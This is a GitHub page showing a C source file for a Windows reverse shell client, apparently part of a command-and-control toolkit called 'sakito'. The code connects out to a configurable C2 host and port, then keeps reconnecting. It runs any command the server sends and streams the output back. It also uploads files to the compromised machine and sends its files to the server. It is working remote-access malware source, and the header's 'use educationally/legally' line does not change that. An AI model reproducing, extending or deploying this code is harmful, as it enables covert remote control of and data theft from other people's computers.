-
Notifications
You must be signed in to change notification settings - Fork 32
/
Copy pathsakito_revshell.c
277 lines (222 loc) · 6.69 KB
/
sakito_revshell.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
/*
Coded by d4rkstat1c.
Use educationally/legally.
*/
#include <ws2tcpip.h>
#include <stdint.h>
#include <direct.h>
#include <errno.h>
#include "lib/headers/nbo_encoding.h"
#include "lib/headers/sakito_core_funcs.h"
#define HOST "127.0.0.1"
#define PORT 4443
#define BUFLEN 8192
#pragma comment(lib, "Ws2_32.lib")
// Function to create connect socket.
const SOCKET create_socket()
{
// Initialize winsock
WSADATA wsData;
WORD ver = MAKEWORD(2, 2);
if (WSAStartup(ver, &wsData) != 0)
return INVALID_SOCKET;
// Create socket.
const SOCKET connect_socket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
if (connect_socket == INVALID_SOCKET)
WSACleanup();
return connect_socket;
}
// Function to connect the connect socket to c2 server.
int c2_connect(const SOCKET connect_socket)
{
// Create sockaddr_in structure.
struct sockaddr_in s_in;
s_in.sin_family = AF_INET;
s_in.sin_addr.s_addr = inet_addr(HOST);
s_in.sin_port = htons(PORT);
// Connect to server hosting c2 service
if (connect(connect_socket, (SOCKADDR*)&s_in, sizeof(s_in)) == SOCKET_ERROR)
{
closesocket(connect_socket);
return SOCKET_ERROR;
}
return SUCCESS;
}
int send_pipe_output(HANDLE child_stdout_read, char* const buf, const SOCKET connect_socket)
{
DWORD bytes_read;
while (1)
{
// Read stdout, stderr bytes from pipe.
ReadFile(child_stdout_read, buf, BUFLEN, &bytes_read, NULL);
// Serialize chunk size bytes (for endianness).
uint16_t chunk_size_nbytes = htons((uint16_t)bytes_read);
// Send serialized chunk size uint16 bytes to server.
if (send(connect_socket, (char*)&chunk_size_nbytes, sizeof(uint16_t), 0) < 1)
return SOCKET_ERROR;
// If we've reached the end of the child's stdout, stderr.
if (bytes_read == 0)
break;
// Send output to server.
if (send(connect_socket, buf, bytes_read, 0) < 1)
return SOCKET_ERROR;
}
return SUCCESS;
}
// Function to execute command.
int exec_cmd(const SOCKET connect_socket, char* const buf)
{
HANDLE child_stdout_read;
HANDLE child_stdout_write;
SECURITY_ATTRIBUTES saAttr;
saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
saAttr.bInheritHandle = TRUE;
saAttr.lpSecurityDescriptor = NULL;
// Create a pipe for the child process' STDOUT.
if ((!CreatePipe(&child_stdout_read, &child_stdout_write, &saAttr, 0))
// Ensure the read handle is not inherited.
|| (!SetHandleInformation(child_stdout_read, HANDLE_FLAG_INHERIT, 0))
// Execute command via CreateProcess.
|| (!s_win_cp(child_stdout_write, buf)))
return FAILURE;
// Send read bytes from pipe (stdout, stderr) to the c2 server.
return send_pipe_output(child_stdout_read, buf, connect_socket);
}
// Client change directory function.
int ch_dir(char* const dir, const SOCKET connect_socket)
{
// '1' = success.
char chdir_result[] = "1";
_chdir(dir);
// If an error occurs.
if (errno == ENOENT)
{
// '0' = failure.
chdir_result[0] = '0';
errno = 0;
}
// Send change directory result to server.
if (send(connect_socket, chdir_result, 1, 0) < 1)
return SOCKET_ERROR;
return SUCCESS;
}
// Function to receive file from client (TCP file transfer).
int send_file(const SOCKET connect_socket, char* const buf)
{
// Default f_size value = -1
uint64_t f_size = FAILURE;
// Open file with read permissions.
HANDLE h_file = s_win_openf(buf+1, GENERIC_READ, OPEN_EXISTING);
// If File Exists.
if (h_file != INVALID_HANDLE_VALUE)
f_size = s_win_fsize(h_file);
// Send read file bytes to server.
if (s_win_sendf(connect_socket, h_file, buf, f_size) < 1)
return SOCKET_ERROR;
// Receive file transfer finished byte.
if (recv(connect_socket, buf, 1, 0) < 1)
return SOCKET_ERROR;
// Close the file.
CloseHandle(h_file);
return SUCCESS;
}
// Function to receive file from client (TCP file transfer).
int recv_file(const SOCKET connect_socket, char* const buf)
{
// Open file.
HANDLE h_file = s_win_openf(buf+1, GENERIC_WRITE, CREATE_ALWAYS);
// Send file transfer start byte.
if (send(connect_socket, FTRANSFER_START, 1, 0) < 1)
return SOCKET_ERROR;
// Receive file size.
if (recv(connect_socket, buf, sizeof(uint64_t), 0) != sizeof(uint64_t))
return SOCKET_ERROR;
// Deserialize f_size.
uint64_t f_size = s_ntohll_conv(buf);
// Initialize i_result to true/1.
int i_result = SUCCESS;
// If file exists.
if (f_size > 0)
// Windows TCP file transfer (recv) function located in sakito_swin_tools.h.
i_result = s_win_recvf(connect_socket, h_file, buf, f_size);
// Close the file.
CloseHandle(h_file);
return i_result;
}
int send_cwd(char* const buf, const SOCKET connect_socket)
{
// Store working directory in buf.
GetCurrentDirectory(BUFLEN, buf);
// Send current working directory to c2 server.
if (send(connect_socket, buf, strlen(buf)+1, 0) < 1)
return SOCKET_ERROR;
return SUCCESS;
}
// Main function for connecting to c2 server & parsing c2 commands.
int main(void)
{
while (1)
{
// Create the connect socket.
const SOCKET connect_socket = create_socket();
/*
If connected to c2 recursively loop to receive/parse c2 command codes. If an error-
occurs (connection lost, etc) break the loop and reconnect & restart loop. The switch-
statement will parse & execute functions based on the order of probability.
*/
if (connect_socket != INVALID_SOCKET)
{
int i_result = c2_connect(connect_socket);
if (i_result)
{
// 8192 == Max command line command length in windows + 1 for null termination.
char buf[BUFLEN+1] = { 0 };
_init: // Receive initialization byte.
i_result = recv(connect_socket, buf, 1, 0);
while (i_result > 0)
{
// Send current working directory to server.
if (send_cwd(buf, connect_socket) < 1)
break;
// Set all bytes in buffer to zero.
memset(buf, '\0', BUFLEN);
// Receive command + parsed data.
if (recv(connect_socket, buf, BUFLEN, 0) < 1)
break;
// *buf is the command code and buf+1 is pointing to the parsed data.
switch (*buf)
{
case '0':
i_result = exec_cmd(connect_socket, buf+1);
break;
case '1':
// Change directory.
i_result = ch_dir(buf+1, connect_socket);
break;
case '2':
// Exit.
return EXIT_SUCCESS;
case '3':
// Upload file to client system.
i_result = recv_file(connect_socket, buf);
break;
case '4':
// Download file from client system.
i_result = send_file(connect_socket, buf);
break;
case '5':
// Reinitiate connection (backgrounded).
goto _init;
case '6':
// Server-side error occurred re-receive command.
i_result = 0;
break;
}
}
}
}
// If unable to connect or an error occurs sleep 8 seconds.
Sleep(8000);
}
return FAILURE;
}